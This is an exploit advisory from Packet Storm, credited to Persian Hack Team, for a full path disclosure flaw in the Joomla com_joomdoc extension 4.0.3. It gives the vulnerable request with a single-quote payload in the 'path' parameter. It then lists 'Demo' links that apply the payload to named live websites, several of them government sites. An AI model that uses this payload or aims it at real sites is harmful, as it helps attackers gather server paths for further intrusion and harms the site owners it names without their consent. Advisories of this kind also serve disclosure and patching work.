Joomla Joomdoc component version 4.0.3 suffers from a path disclosure vulnerability.
271e5a3265998b3c29c799d994e9fcba983e0e88632720efe653047f4b49c6f9######################
# Exploit Title : Joomla com_joomdoc - Full Path Disclosure Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/joomdoc
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 4.0.3
# Date: 2016/06/08
######################
#
# PoC:
# Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/.
# index.php?option=com_joomdoc&view=documents&path=[']
# Demo :
# http://www.webster-ma.gov/index.php?option=com_joomdoc&view=documents&path=%27Agendas/Board+Of+Fire+Engineers&Itemid=735
# http://www.bpp.gov.ng/index.php?option=com_joomdoc&view=documents&path=%27Certificates+of+No+Objection+Jan-October+2013.pdf
# http://www.nursingcouncil.org.jm/index.php?option=com_joomdoc&view=documents&path=%27Application%20Forms&Itemid=62
######################
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed